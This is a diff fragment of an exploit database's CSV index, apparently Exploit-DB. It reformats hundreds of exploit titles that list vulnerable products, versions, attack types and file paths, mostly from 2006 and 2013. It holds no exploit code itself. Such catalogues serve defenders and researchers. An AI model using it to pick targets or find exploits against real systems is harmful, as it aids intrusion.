- TriEditDocument Denial of Service",2006-07-11,hdm,windows,dos,0 28208,platforms/asp/webapps/28208.txt,"FlexWatch 3.0 - AIndex.ASP Authorization Bypass",2006-07-12,"Jaime Blasco",asp,webapps,0 @@ -25283,10 +25278,10 @@ id,file,description,date,author,platform,type,port 28222,platforms/windows/dos/28222.txt,"Microsoft Works 8.0 Spreadsheet - Multiple Vulnerabilities",2006-06-14,"Benjamin Franz",windows,dos,0 28223,platforms/php/webapps/28223.txt,"Subberz Lite - UserFunc Remote File Inclusion",2006-07-14,"Chironex Fleckeri",php,webapps,0 28224,platforms/windows/remote/28224.c,"Microsoft PowerPoint 2003 - mso.dll PPT Processing Unspecified Code Execution",2006-07-14,"naveed afzal",windows,remote,0 -28225,platforms/windows/remote/28225.c,"Microsoft PowerPoint 2003 powerpnt.exe Unspecified Issue",2006-07-14,"naveed afzal",windows,remote,0 +28225,platforms/windows/remote/28225.c,"Microsoft PowerPoint 2003 - powerpnt.exe Unspecified Issue",2006-07-14,"naveed afzal",windows,remote,0 28226,platforms/windows/remote/28226.c,"Microsoft PowerPoint 2003 PPT File Closure Memory Corruption",2006-07-14,"naveed afzal",windows,remote,0 28227,platforms/windows/dos/28227.txt,"Microsoft Windows 2000/XP - Registry Access Local Denial of Service",2006-07-15,"David Matousek",windows,dos,0 -28228,platforms/hardware/dos/28228.txt,"Sunbelt Kerio Personal Firewall 4.3.426 CreateRemoteThread Denial of Service",2006-07-15,"David Matousek",hardware,dos,0 +28228,platforms/hardware/dos/28228.txt,"Sunbelt Kerio Personal Firewall 4.3.426 - CreateRemoteThread Denial of Service",2006-07-15,"David Matousek",hardware,dos,0 28229,platforms/php/webapps/28229.txt,"VisNetic Mail Server 8.3.5 - Multiple File Inclusion",2006-07-17,"Tan Chew Keong",php,webapps,0 28230,platforms/hardware/dos/28230.txt,"Multiple D-Link Routers - UPNP Buffer Overflow",2006-07-17,"Barnaby Jack",hardware,dos,0 28231,platforms/php/webapps/28231.txt,"ListMessenger 0.9.3 - LM_Path Parameter Remote File Inclusion",2006-07-17,xoron,php,webapps,0 @@ -25301,7 +25296,7 @@ id,file,description,date,author,platform,type,port 28395,platforms/windows/dos/28395.txt,"VMware 5.5.1 - Partition Table Deletion Denial of Service",2006-08-15,nop,windows,dos,0 28243,platforms/linux/webapps/28243.txt,"Synology DiskStation Manager (DSM) 4.3-3776 - Multiple Vulnerabilities",2013-09-12,"Andrea Fabrizi",linux,webapps,0 28244,platforms/windows/dos/28244.txt,"Microsoft Internet Explorer 6.0 - DataSourceControl Denial of Service",2006-07-19,hdm,windows,dos,0 -28245,platforms/hardware/remote/28245.pl,"Cisco Security Monitoring Analysis and Response System JBoss Command Execution",2006-07-19,"Jon Hart",hardware,remote,0 +28245,platforms/hardware/remote/28245.pl,"Cisco Security Monitoring Analysis and Response System JBoss - Command Execution",2006-07-19,"Jon Hart",hardware,remote,0 28246,platforms/windows/dos/28246.txt,"Microsoft Internet Explorer 6.0 - OVCtl Denial of Service",2006-07-19,hdm,windows,dos,0 28247,platforms/php/webapps/28247.txt,"IDevSpot PHPLinkExchange 1.0 - Index.php Remote File Inclusion",2006-07-20,r0t,php,webapps,0 28248,platforms/php/webapps/28248.txt,"IDevSpot PHPHostBot 1.0 - Index.php Remote File Inclusion",2006-07-20,r0t,php,webapps,0 @@ -25313,7 +25308,7 @@ id,file,description,date,author,platform,type,port 28254,platforms/multiple/remote/28254.txt,"Apache Tomcat 5 - Information Disclosure",2006-07-21,"ScanAlert Security",multiple,remote,0 28255,platforms/php/webapps/28255.txt,"Chameleon LE 1.203 - Index.php Directory Traversal",2006-07-21,kicktd,php,webapps,0 28256,platforms/windows/dos/28256.html,"Microsoft Internet Explorer 6.0 - Internet.HHCtrl Click Denial of Service",2006-07-22,"Alex F",windows,dos,0 -28257,platforms/linux/dos/28257.txt,"GnuPG 1.4/1.9 Parse_Comment Remote Buffer Overflow",2006-07-22,"Evgeny Legerov",linux,dos,0 +28257,platforms/linux/dos/28257.txt,"GnuPG 1.4/1.9 - Parse_Comment Remote Buffer Overflow",2006-07-22,"Evgeny Legerov",linux,dos,0 28258,platforms/windows/dos/28258.txt,"Microsoft Internet Explorer 6.0 - Multiple Object ListWidth Property Denial of Service",2006-07-23,hdm,windows,dos,0 28259,platforms/windows/dos/28259.txt,"Microsoft Internet Explorer 6.0 - NMSA.ASFSourceMediaDescription Stack Overflow",2006-07-24,hdm,windows,dos,0 28260,platforms/php/webapps/28260.txt,"Lussumo Vanilla 1.0 - RootDirectory Remote File Inclusion",2006-07-24,MFox,php,webapps,0 @@ -25332,7 +25327,7 @@ id,file,description,date,author,platform,type,port 28274,platforms/php/webapps/28274.txt,"PHP Pro Bid 5.2.4 - auctionsearch.php advsrc Parameter XSS",2006-07-25,"EllipSiS Security",php,webapps,0 28275,platforms/php/webapps/28275.txt,"PHP Pro Bid 5.2.4 - viewfeedback.php Multiple Parameter SQL Injection",2006-07-25,"EllipSiS Security",php,webapps,0 28276,platforms/php/webapps/28276.txt,"PHP Pro Bid 5.2.4 - categories.php orderType Parameter SQL Injection",2006-07-25,"EllipSiS Security",php,webapps,0 -28277,platforms/multiple/dos/28277.txt,"Opera Web Browser 9 CSS Background URI Memory Corruption",2006-07-25,hdm,multiple,dos,0 +28277,platforms/multiple/dos/28277.txt,"Opera Web Browser 9 - CSS Background URI Memory Corruption",2006-07-25,hdm,multiple,dos,0 28278,platforms/jsp/webapps/28278.txt,"OpenCMS 6.0/6.2 - Multiple Unauthorized Access Vulnerabilities",2006-07-26,"Meder Kydyraliev",jsp,webapps,0 28279,platforms/hardware/webapps/28279.txt,"Router ONO Hitron CDE-30364 - CSRF",2013-09-14,"Matias Mingorance Svensson",hardware,webapps,0 28280,platforms/php/webapps/28280.txt,"wwwThreads - Calendar.php Cross-Site Scripting",2006-07-26,l2odon,php,webapps,0 @@ -25342,12 +25337,12 @@ id,file,description,date,author,platform,type,port 28284,platforms/windows/remote/28284.html,"Mitsubishi MC-WorkX 8.02 - ActiveX Control (IcoLaunch) File Execution",2013-09-15,blake,windows,remote,0 28286,platforms/windows/dos/28286.txt,"Microsoft Internet Explorer 6.0 - NDFXArtEffects Stack Overflow",2006-07-27,hdm,windows,dos,0 28287,platforms/linux/local/28287.c,"Linux-HA Heartbeat 1.2.3/2.0.x - Insecure Default Permissions on Shared Memory",2006-07-27,anonymous,linux,local,0 -28288,platforms/linux/local/28288.c,"MidiRecord2 MidiRecord.CC Local Buffer Overflow",2006-07-27,"Dedi Dwianto",linux,local,0 +28288,platforms/linux/local/28288.c,"MidiRecord2 MidiRecord.CC - Local Buffer Overflow",2006-07-27,"Dedi Dwianto",linux,local,0 28289,platforms/php/webapps/28289.txt,"Bosdates 3.x/4.0 - Payment.php Remote File Inclusion",2006-07-27,admin@jaascois.com,php,webapps,0 28290,platforms/php/webapps/28290.txt,"MyBulletinBoard 1.x - UserCP.php Cross-Site Scripting",2006-07-27,"Roozbeh Afrasiabi",php,webapps,0 28291,platforms/php/webapps/28291.txt,"MyBulletinBoard 1.x - UserCP.php Directory Traversal",2006-07-27,"Roozbeh Afrasiabi",php,webapps,0 28292,platforms/php/webapps/28292.txt,"GeoClassifieds Enterprise 2.0.5.x - Index.php Multiple Cross-Site Scripting Vulnerabilities",2006-07-27,"EllipSiS Security",php,webapps,0 -28293,platforms/multiple/dos/28293.txt,"Oracle 10g Alter Session Integer Overflow",2006-07-27,"putosoft softputo",multiple,dos,0 +28293,platforms/multiple/dos/28293.txt,"Oracle 10g - Alter Session Integer Overflow",2006-07-27,"putosoft softputo",multiple,dos,0 28294,platforms/php/webapps/28294.txt,"PHP-Nuke - INP Modules.php Cross-Site Scripting",2006-07-28,l2odon,php,webapps,0 28295,platforms/php/webapps/28295.txt,"JD-WordPress 2.0-1.0 RC 2 for Joomla - wp-comments-post.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 28296,platforms/php/webapps/28296.txt,"JD-WordPress 2.0-1.0 RC 2 for Joomla - wp-feed.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 @@ -25393,12 +25388,12 @@ id,file,description,date,author,platform,type,port 28337,platforms/windows/remote/28337.rb,"HP ProCurve Manager SNAC - UpdateCertificatesServlet File Upload",2013-09-17,Metasploit,windows,remote,443 28338,platforms/linux/dos/28338.txt,"Vino VNC Server 3.7.3 - Persistent Denial of Service",2013-09-17,"Trustwave's SpiderLabs",linux,dos,5900 28339,platforms/asp/webapps/28339.txt,"Anychart 3.0 - Password Parameter SQL Injection",2006-08-03,sCORPINo,asp,webapps,0 -28340,platforms/multiple/webapps/28340.c,"PSWD.JS Insecure Password Hash Weakness",2006-08-03,"Gianstefano Monni",multiple,webapps,0 +28340,platforms/multiple/webapps/28340.c,"PSWD.JS - Insecure Password Hash Weakness",2006-08-03,"Gianstefano Monni",multiple,webapps,0 28341,platforms/windows/dos/28341.txt,"Yahoo! Messenger 8.0.0.863 - File Extension Spoofing",2006-08-04,ivancool2003,windows,dos,0 28342,platforms/php/webapps/28342.txt,"VBulletin 3.0.14 - global.php Encoded URL XSS",2006-08-05,imei,php,webapps,0 28343,platforms/windows/dos/28343.txt,"Microsoft Internet Explorer 6.0/7.0 - IFrame Refresh Denial of Service",2006-08-06,"Thomas Pollet",windows,dos,0 -28344,platforms/multiple/remote/28344.txt,"DConnect Daemon Listen Thread UDP Remote Buffer Overflow",2006-08-06,"Luigi Auriemma",multiple,remote,0 -28345,platforms/multiple/dos/28345.txt,"DConnect Daemon DC Chat Denial of Service",2006-08-06,"Luigi Auriemma",multiple,dos,0 +28344,platforms/multiple/remote/28344.txt,"DConnect Daemon - Listen Thread UDP Remote Buffer Overflow",2006-08-06,"Luigi Auriemma",multiple,remote,0 +28345,platforms/multiple/dos/28345.txt,"DConnect Daemon DC Chat - Denial of Service",2006-08-06,"Luigi Auriemma",multiple,dos,0 28509,platforms/php/webapps/28509.txt,"XHP CMS 0.5.1 - Index.php Cross-Site Scripting",2006-09-11,"HACKERS PAL",php,webapps,0 28347,platforms/php/webapps/28347.txt,"XennoBB 2.1 - Profile.php Multiple SQL Injection",2006-08-07,"Chris Boulton",php,webapps,0 28348,platforms/linux/dos/28348.txt,"Clam Anti-Virus ClamAV 0.88.x - UPX Compressed PE File Heap Buffer Overflow",2006-08-07,"Damian Put",linux,dos,0 @@ -25413,16 +25408,16 @@ id,file,description,date,author,platform,type,port 28357,platforms/windows/remote/28357.asc,"Microsoft Windows Explorer 2000/2003/XP - Drag and Drop Remote Code Execution",2006-07-27,"Plebo Aesdi Nael",windows,remote,0 28358,platforms/linux/dos/28358.txt,"Linux Kernel 2.6.17.7 - NFS and EXT3 Combination Remote Denial of Service",2006-08-07,"James McKenzie",linux,dos,0 28359,platforms/php/webapps/28359.txt,"PHPPrintAnalyzer 1.1 - Index.php Remote File Inclusion",2006-08-07,sh3ll,php,webapps,0 -28360,platforms/windows/remote/28360.c,"EasyCafe 2.1/2.2 Security Restriction Bypass",2006-08-07,"Mobin Yazarlou",windows,remote,0 +28360,platforms/windows/remote/28360.c,"EasyCafe 2.1/2.2 - Security Restriction Bypass",2006-08-07,"Mobin Yazarlou",windows,remote,0 28361,platforms/multiple/dos/28361.c,"Festalon 0.5 - .HES Files Remote Heap Buffer Overflow",2006-08-07,"Luigi Auriemma",multiple,dos,0 -28362,platforms/php/webapps/28362.txt,"Simple One File Guestbook 1.0 Security Bypass",2006-08-09,omnipresent,php,webapps,0 +28362,platforms/php/webapps/28362.txt,"Simple One File Guestbook 1.0 - Security Bypass",2006-08-09,omnipresent,php,webapps,0 28363,platforms/php/webapps/28363.txt,"CLUB Nuke 2.0 - Multiple SQL Injection",2006-08-09,ASIANEAGLE,php,webapps,0 28364,platforms/php/webapps/28364.txt,"XennoBB 1.0.5/1.0.6/2.1/2.2 - Profile.php Directory Traversal",2006-08-09,"Chris Boulton",php,webapps,0 28365,platforms/multiple/remote/28365.txt,"Apache 2.2.2 - CGI Script Source Code Information Disclosure",2006-08-09,"Susam Pal",multiple,remote,0 28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x - Mybloggie_Root_Path Parameter Multiple Remote File Inclusion",2006-06-02,sh3ll,php,webapps,0 28367,platforms/linux/dos/28367.txt,"AlsaPlayer 0.99.x - Multiple Buffer Overflow Vulnerabilities",2006-08-09,"Luigi Auriemma",linux,dos,0 28368,platforms/multiple/remote/28368.txt,"ArcSoft Mms Composer 1.5.5/2.0 - Multiple Vulnerabilities",2006-08-09,"Collin R. Mulliner",multiple,remote,0 -28369,platforms/windows/dos/28369.dpr,"IrfanView 3.98 ANI Image File Denial of Service",2006-08-09,sehato,windows,dos,0 +28369,platforms/windows/dos/28369.dpr,"IrfanView 3.98 - .ANI Image File Denial of Service",2006-08-09,sehato,windows,dos,0 28370,platforms/php/webapps/28370.txt,"Mafia Moblog 6 - Big.php Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0 28371,platforms/php/webapps/28371.txt,"YaBBSE 1.x - Index.php Cross-Site Scripting",2006-08-10,O.U.T.L.A.W,php,webapps,0 28372,platforms/php/webapps/28372.txt,"Tiny Web Gallery 1.5 - Image Parameter Multiple Remote File Inclusion",2006-08-10,x0r0n,php,webapps,0 @@ -25448,7 +25443,7 @@ id,file,description,date,author,platform,type,port 28392,platforms/php/webapps/28392.txt,"Zen Cart Web Shopping Cart 1.x - autoload_func.php autoLoadConfig[999][0][loadFile] Parameter Remote File Inclusion",2006-08-15,"James Bercegay",php,webapps,0 28393,platforms/asp/webapps/28393.txt,"AspxCommerce 2.0 - Arbitrary File Upload",2013-09-19,SANTHO,asp,webapps,0 28396,platforms/php/webapps/28396.txt,"Reporter 1.0 Mambo Component - Reporter.sql.php Remote File Inclusion",2006-08-16,Crackers_Child,php,webapps,0 -28397,platforms/linux/remote/28397.sh,"GNU BinUtils 2.1x GAS Buffer Overflow",2006-08-17,"Tavis Ormandy",linux,remote,0 +28397,platforms/linux/remote/28397.sh,"GNU BinUtils 2.1x - GAS Buffer Overflow",2006-08-17,"Tavis Ormandy",linux,remote,0 28398,platforms/linux/remote/28398.txt,"MySQL 4/5 - SUID Routine Miscalculation Arbitrary DML Statement Execution",2006-08-17,"Michal Prokopiuk",linux,remote,0 28399,platforms/php/webapps/28399.txt,"CubeCart 3.0.x - Multiple Input Validation Vulnerabilities",2006-08-17,rgod,php,webapps,0 28400,platforms/windows/remote/28400.html,"Microsoft Internet Explorer 6.0 - TSUserEX.DLL ActiveX Control Memory Corruption",2006-08-17,nop,windows,remote,0 @@ -25476,7 +25471,7 @@ id,file,description,date,author,platform,type,port 28422,platforms/php/webapps/28422.txt,"DieselScripts Diesel Paid Mail - Getad.php Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0 28423,platforms/php/webapps/28423.txt,"RedBlog 0.5 - Index.php Remote File Inclusion",2006-08-22,Root3r_H3ll,php,webapps,0 28424,platforms/linux/remote/28424.txt,"Apache HTTP Server 1.3.35 / 2.0.58 / 2.2.2 - Arbitrary HTTP Request Headers Security Weakness",2006-08-24,"Thiago Zaninotti",linux,remote,0 -28425,platforms/solaris/local/28425.txt,"Sun Solaris 8/9 UCB/PS Command Local Information Disclosure",2006-03-27,anonymous,solaris,local,0 +28425,platforms/solaris/local/28425.txt,"Sun Solaris 8/9 UCB/PS - Command Local Information Disclosure",2006-03-27,anonymous,solaris,local,0 28426,platforms/php/webapps/28426.txt,"Headline Portal Engine 0.x/1.0 - HPEInc Parameter Multiple Remote File Inclusion",2006-08-21,"the master",php,webapps,0 28427,platforms/novell/local/28427.pl,"Novell Identity Manager - Arbitrary Command Execution",2006-08-18,anonymous,novell,local,0 28428,platforms/php/webapps/28428.txt,"Yapig 0.9x - Thanks_comment.php Cross-Site Scripting",2006-10-13,Kuon,php,webapps,0 @@ -25538,7 +25533,7 @@ id,file,description,date,author,platform,type,port 28488,platforms/php/webapps/28488.php,"PHP-Proxima 6.0 - BB_Smilies.php Local File Inclusion",2006-09-04,Kacper,php,webapps,0 28489,platforms/windows/remote/28489.txt,"Easy Address Book Web Server 1.2 - Remote Format String",2006-09-04,"Revnic Vasile",windows,remote,0 28490,platforms/php/webapps/28490.txt,"SoftBB 0.1 - Page Parameter Cross-Site Scripting",2006-09-05,ThE__LeO,php,webapps,0 -28491,platforms/multiple/dos/28491.txt,"DSocks 1.3 Name Variable Buffer Overflow",2006-09-05,"Michael Adams",multiple,dos,0 +28491,platforms/multiple/dos/28491.txt,"DSocks 1.3 - Name Variable Buffer Overflow",2006-09-05,"Michael Adams",multiple,dos,0 28492,platforms/php/webapps/28492.txt,"Uni-vert PhpLeague 0.82 - Joueurs.php SQL Injection",2006-09-06,DrEiNsTeIn,php,webapps,0 28493,platforms/php/webapps/28493.txt,"PHP-Nuke Book Catalog Module 1.0 - 'upload.php' Arbitrary File Upload",2006-09-07,osm,php,webapps,0 28494,platforms/php/webapps/28494.txt,"AckerTodo 4.0 - Index.php Cross-Site Scripting",2006-09-07,viz.security,php,webapps,0 @@ -25548,7 +25543,7 @@ id,file,description,date,author,platform,type,port 28498,platforms/php/webapps/28498.txt,"Vikingboard Viking board 0.1b - report.php p Parameter XSS",2006-09-08,Hessam-x,php,webapps,0 28499,platforms/php/webapps/28499.txt,"Vikingboard 0.1 - Topic.php SQL Injection",2006-09-08,Hessam-x,php,webapps,0 28500,platforms/windows/remote/28500.txt,"Microsoft Indexing Service - Query Validation Cross-Site Scripting",2006-09-12,"Eiji James Yoshida",windows,remote,0 -28501,platforms/multiple/remote/28501.xml,"Sage 1.3.6 Input Validation",2006-09-08,pdp,multiple,remote,0 +28501,platforms/multiple/remote/28501.xml,"Sage 1.3.6 - Input Validation",2006-09-08,pdp,multiple,remote,0 28502,platforms/php/webapps/28502.txt,"TextAds - delete.php id Parameter XSS",2006-09-09,s3rv3r_hack3r,php,webapps,0 28503,platforms/php/webapps/28503.txt,"TextAds - error.php error Parameter XSS",2006-09-09,s3rv3r_hack3r,php,webapps,0 28504,platforms/php/local/28504.php,"PHP 3-5 - Ini_Restore() Safe_Mode and Open_Basedir Restriction Bypass",2006-09-09,"Maksymilian Arciemowicz",php,local,0 @@ -25607,7 +25602,7 @@ id,file,description,date,author,platform,type,port 28659,platforms/palm_os/webapps/28659.txt,"Jamroom 3.0.16 - Login.php Cross-Site Scripting",2006-09-24,meto5757,palm_os,webapps,0 28660,platforms/php/webapps/28660.php,"CPanel 5-10 - SUID Wrapper Remote Privilege Escalation",2006-09-24,"Nima Salehi",php,webapps,0 28560,platforms/php/webapps/28560.txt,"Piwigo 2.5.2 - Cross-Site Scripting",2013-09-26,Arsan,php,webapps,0 -28561,platforms/multiple/dos/28561.pl,"Blast XPlayer Local Buffer Overflow PoC",2013-09-26,flux77,multiple,dos,0 +28561,platforms/multiple/dos/28561.pl,"Blast XPlayer - Local Buffer Overflow PoC",2013-09-26,flux77,multiple,dos,0 28562,platforms/hardware/webapps/28562.txt,"Hewlett-Packard 2620 Switch Series. Edit Admin Account - CSRF",2013-09-26,"Hubert Gradek",hardware,webapps,0 28563,platforms/multiple/webapps/28563.txt,"Posnic Stock Management System 1.02 - Multiple Vulnerabilities",2013-09-26,"Sarahma Security",multiple,webapps,0 28564,platforms/php/webapps/28564.txt,"ArticleSetup - Multiple Vulnerabilities",2013-09-26,DevilScreaM,php,webapps,0 @@ -25691,7 +25686,7 @@ id,file,description,date,author,platform,type,port 28641,platforms/windows/remote/28641.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Unspecified Arbitrary File Manipulation",2006-09-21,"Patrick Webster",windows,remote,0 28642,platforms/windows/remote/28642.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Audit Event System Unspecified Replay Attack",2006-09-21,"Patrick Webster",windows,remote,0 28643,platforms/osx/remote/28643.txt,"Apple Mac OS X 10.x - AirPort Wireless Driver Multiple Buffer Overflow Vulnerabilities",2006-09-21,"David Maynor",osx,remote,0 -28644,platforms/php/webapps/28644.txt,"Google Mini Search Appliance 4.4.102.M.36 Information Disclosure",2006-09-22,"Patrick Webster",php,webapps,0 +28644,platforms/php/webapps/28644.txt,"Google Mini Search Appliance 4.4.102.M.36 - Information Disclosure",2006-09-22,"Patrick Webster",php,webapps,0 28645,platforms/php/webapps/28645.txt,"CakePHP 1.1.7.3363 - Vendors.php Directory Traversal",2006-09-22,"James Bercegay",php,webapps,0 28646,platforms/php/webapps/28646.txt,"mysource 2.14.8/2.16 - Multiple Vulnerabilities",2006-09-22,"Patrick Webster",php,webapps,0 28647,platforms/php/webapps/28647.txt,"PLESK 7.5/7.6 - Filemanager.php Directory Traversal",2006-09-22,GuanYu,php,webapps,0 @@ -25729,7 +25724,7 @@ id,file,description,date,author,platform,type,port 28726,platforms/multiple/dos/28726.pl,"OpenSSL SSLv2 - Null Pointer Dereference Client Denial of Service",2006-09-28,"Noam Rathaus",multiple,dos,0 28679,platforms/multiple/dos/28679.txt,"Evince PDF Reader 2.32.0.145 (Windows) / 3.4.0 (Linux) - Denial of Service",2013-10-02,Deva,multiple,dos,0 28680,platforms/linux/local/28680.txt,"PinApp Mail-SeCure 3.70 - Access Control Failure",2013-10-02,"Core Security",linux,local,0 -28681,platforms/windows/remote/28681.rb,"freeFTPd PASS Command Buffer Overflow",2013-10-02,Metasploit,windows,remote,21 +28681,platforms/windows/remote/28681.rb,"freeFTPd - PASS Command Buffer Overflow",2013-10-02,Metasploit,windows,remote,21 28682,platforms/windows/remote/28682.rb,"Micorosft Internet Explorer - SetMouseCapture Use-After-Free",2013-10-02,Metasploit,windows,remote,0 28683,platforms/linux/dos/28683.txt,"HylaFAX+ 5.2.4 > 5.5.3 - Buffer Overflow",2013-10-02,"Dennis Jenkins",linux,dos,0 28684,platforms/php/webapps/28684.txt,"Gnew 2013.1 - Multiple Vulnerabilities (2)",2013-10-02,"High-Tech Bridge SA",php,webapps,80 @@ -25759,10 +25754,10 @@ id,file,description,date,author,platform,type,port 28728,platforms/php/webapps/28728.txt,"Geotarget - Script.php Remote File Inclusion",2006-09-29,"RaVeR shi mozi",php,webapps,0 28708,platforms/php/webapps/28708.txt,"elproLOG MONITOR WebAccess 2.1 - Multiple Vulnerabilities",2013-10-04,Vulnerability-Lab,php,webapps,80 28709,platforms/php/webapps/28709.txt,"FlashChat 6.0.2-6.0.8 - Arbitrary File Upload",2013-10-04,x-hayben21,php,webapps,80 -28710,platforms/osx/remote/28710.txt,"Skype Technologies Skype 1.5 NSRunAlertPanel Remote Format String",2006-09-26,"Tom Ferris",osx,remote,0 +28710,platforms/osx/remote/28710.txt,"Skype Technologies Skype 1.5 - NSRunAlertPanel Remote Format String",2006-09-26,"Tom Ferris",osx,remote,0 28711,platforms/php/webapps/28711.txt,"PHP Invoice 2.2 - Home.php Cross-Site Scripting",2006-09-26,meto5757,php,webapps,0 28712,platforms/php/webapps/28712.txt,"CMS Formulasi 2.07 - Multiple Vulnerabilities",2013-10-04,"Sarahma Security",php,webapps,80 -28713,platforms/php/remote/28713.php,"Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE",2013-10-04,rgod,php,remote,0 +28713,platforms/php/remote/28713.php,"Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object - RCE",2013-10-04,rgod,php,remote,0 28714,platforms/php/webapps/28714.txt,"PHPSelect Web Development - Index.php3 Remote File Inclusion",2006-09-27,rUnViRuS,php,webapps,0 29274,platforms/php/webapps/29274.html,"Horde Groupware Web Mail Edition 5.1.2 - CSRF (1)",2013-10-29,"Marcela Benetrix",php,webapps,80 28716,platforms/php/webapps/28716.txt,"MKPortal 1.0/1.1 - PMPopup.php Cross-Site Scripting",2006-09-27,HanowarS,php,webapps,0 @@ -25849,7 +25844,7 @@ id,file,description,date,author,platform,type,port 28810,platforms/unix/remote/28810.rb,"GestioIP - Remote Command Execution",2013-10-08,Metasploit,unix,remote,0 28811,platforms/osx/dos/28811.txt,"Apple Motion 5.0.7 - Integer Overflow",2013-10-08,"Jean Pascal Pereira",osx,dos,0 28812,platforms/freebsd/dos/28812.c,"FreeBSD 5.5/6.x - Scheduler Policy Local Denial of Service",2006-10-13,"Diane Bruce",freebsd,dos,0 -28813,platforms/freebsd/dos/28813.c,"FreeBSD 6.0/6.1 Ftrucante Local Denial of Service",2006-10-13,"Kirk Russell",freebsd,dos,0 +28813,platforms/freebsd/dos/28813.c,"FreeBSD 6.0/6.1 Ftrucante - Local Denial of Service",2006-10-13,"Kirk Russell",freebsd,dos,0 28814,platforms/php/webapps/28814.txt,"RamaCMS - ADODB.Inc.php Remote File Inclusion",2006-10-13,"Le CoPrA",php,webapps,0 28815,platforms/php/webapps/28815.txt,"H-Sphere 2.x - WebShell Login.php Cross-Site Scripting",2006-10-14,b0rizQ,php,webapps,0 28816,platforms/linux/dos/28816.txt,"KMail 1.x - HTML Element Handling Denial of Service",2006-10-16,nnp,linux,dos,0 @@ -25859,7 +25854,7 @@ id,file,description,date,author,platform,type,port 28820,platforms/php/webapps/28820.txt,"Webgenius Goop Gallery 2.0 - Index.php Cross-Site Scripting",2006-10-17,Lostmon,php,webapps,0 28821,platforms/php/webapps/28821.txt,"Maintain 3.0.0-RC2 - Example6.php Remote File Inclusion",2006-10-16,ERNE,php,webapps,0 28822,platforms/windows/dos/28822.txt,"Microsoft Class Package Export Tool 5.0.2752 - Clspack.exe Local Buffer Overflow",2006-10-16,mmd_000,windows,dos,0 -28823,platforms/php/webapps/28823.pl,"PowerMovieList 0.13/0.14 Edit User HTML Injection",2006-10-16,MP,php,webapps,0 +28823,platforms/php/webapps/28823.pl,"PowerMovieList 0.13/0.14 - Edit User HTML Injection",2006-10-16,MP,php,webapps,0 28824,platforms/php/webapps/28824.txt,"PHPList 2.10.2 - Index.php Cross-Site Scripting",2006-10-17,b0rizQ,php,webapps,0 28825,platforms/php/webapps/28825.txt,"Dev Web Manager System 1.5 - Index.php Cross-Site Scripting",2006-10-17,CorryL,php,webapps,0 28826,platforms/php/webapps/28826.txt,"Cerberus Helpdesk 3.2.1 - Rpc.php Unauthorized Access",2006-10-18,jonepet,php,webapps,0 @@ -25881,7 +25876,7 @@ id,file,description,date,author,platform,type,port 28842,platforms/php/webapps/28842.txt,"Zwahlen's Online Shop 5.2.2 - Cat Parameter Cross-Site Scripting",2006-10-23,MC.Iglo,php,webapps,0 28843,platforms/php/webapps/28843.txt,"cPanel 10.9 - DoSetmytheme theme Parameter XSS",2006-10-23,Crackers_Child,php,webapps,0 28844,platforms/php/webapps/28844.txt,"cPanel 10.9 - editzonetemplate template Parameter XSS",2006-10-23,Crackers_Child,php,webapps,0 -28845,platforms/php/webapps/28845.txt,"Shop-Script Multiple HTTP Response Splitting Vulnerabilities",2006-10-23,"Debasis Mohanty",php,webapps,0 +28845,platforms/php/webapps/28845.txt,"Shop-Script - Multiple HTTP Response Splitting Vulnerabilities",2006-10-23,"Debasis Mohanty",php,webapps,0 28846,platforms/php/webapps/28846.html,"WikiNi 0.4.x - Waka.php Multiple HTML-Injection Vulnerabilities",2006-10-23,"Raphael Huck",php,webapps,0 28847,platforms/hardware/remote/28847.txt,"D-Link DSL-G624T - Information Disclosure",2006-10-23,jose.palanco,hardware,remote,0 28848,platforms/hardware/remote/28848.txt,"INCA IM-204 - Information Disclosure",2006-10-23,Crackers_Child,hardware,remote,0 @@ -25895,7 +25890,7 @@ id,file,description,date,author,platform,type,port 28857,platforms/asp/webapps/28857.txt,"Snitz Forums 2000 3.4.6 - Pop_Mail.ASP SQL Injection",2006-10-24,"Arham Muhammad",asp,webapps,0 28858,platforms/php/webapps/28858.txt,"Simpnews 2.x - admin/index.php Unspecified XSS",2006-10-24,security@vigilon.com,php,webapps,0 28859,platforms/php/webapps/28859.txt,"Simpnews 2.x - admin/pwlost.php Unspecified XSS",2006-10-24,security@vigilon.com,php,webapps,0 -28860,platforms/windows/dos/28860.c,"FtpXQ Server 3.01 MKD Command Remote Overflow DoS",2006-10-24,"Federico Fazzi",windows,dos,0 +28860,platforms/windows/dos/28860.c,"FtpXQ Server 3.01 - MKD Command Remote Overflow DoS",2006-10-24,"Federico Fazzi",windows,dos,0 28861,platforms/php/webapps/28861.txt,"Comment IT 0.2 - PathToComment Parameter Remote File Inclusion",2006-10-25,"Cold Zero",php,webapps,0 28862,platforms/php/webapps/28862.txt,"PHPMyConferences 8.0.2 - Init.php Remote File Inclusion",2006-10-25,The-0utl4w,php,webapps,0 28863,platforms/php/webapps/28863.txt,"MAXdev MD-Pro 1.0.76 - User.php Cross-Site Scripting",2006-10-26,r00t,php,webapps,0 @@ -25923,7 +25918,7 @@ id,file,description,date,author,platform,type,port 28885,platforms/php/webapps/28885.php,"PHP-Nuke 7.x - Journal Module Search.php SQL Injection",2006-10-31,Paisterist,php,webapps,0 28886,platforms/php/webapps/28886.txt,"The Search Engine Project 0.942 - Configfunction.php Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 28887,platforms/java/remote/28887.txt,"Sun Java System 6.x - Messenger Express Cross-Site Scripting",2006-10-31,Handrix,java,remote,0 -28888,platforms/hardware/remote/28888.txt,"ECI Telecom B-Focus ADSL2+ Combo332+ Wireless Router Information Disclosure",2006-10-31,LegendaryZion,hardware,remote,0 +28888,platforms/hardware/remote/28888.txt,"ECI Telecom B-Focus ADSL2+ Combo332+ Wireless Router - Information Disclosure",2006-10-31,LegendaryZion,hardware,remote,0 28889,platforms/php/webapps/28889.txt,"Netquery 4.0 - NQUser.php Cross-Site Scripting",2006-10-31,"Tal Argoni",php,webapps,0 28890,platforms/php/webapps/28890.txt,"iPlanet Messaging Server - Messenger Express Expression() HTML Injection",2006-10-31,LegendaryZion,php,webapps,0 